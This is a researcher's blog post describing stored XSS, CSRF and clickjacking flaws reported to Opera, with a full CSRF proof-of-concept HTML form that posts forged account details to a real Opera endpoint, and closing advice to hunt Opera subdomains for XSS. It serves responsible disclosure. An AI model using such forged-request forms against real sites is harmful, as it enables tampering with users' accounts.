Monday, April 29, 2013

Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera




Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.

I reported few vulnerabilities to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the vulnerabilities are as follows:

Stored XSS


The "Username" input was not being sanitized properly, Which resulted in an execution of javascript.

CSRF POC

The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.

POC

<html>

<body>
<form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST">
<input type="hidden" name="email" value="rafaybaloch&#64;gmail&#46;com" />
<input type="hidden" name="name" value="Rafay&#32;Baloch" />
<input type="hidden" name="address1" value="f&#45;10&#44;afasf&#32;afs&#32;asf&#32;1&#44;block&#32;15&#32;near&#32;income&#32;tax&#32;office&#44;asssssss&#45;e&#45;johar" />
<input type="hidden" name="address2" value="" />
<input type="hidden" name="city" value="Karachi" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="country" value="PK" />
<input type="hidden" name="zip" value="44000" />
<input type="hidden" name="phone" value="&#43;923333333333" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

Opera Hall Of Fame

So, For my findings, Opera listed my name under their hall of fame:



Gift from Opera

As a token of appreciation, they also send me the following gifts:


Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.

Posted by R2blog. R2blog auto post for blogspot. Download at http://R2blogger.blogspot.com


0 comments:

Post a Comment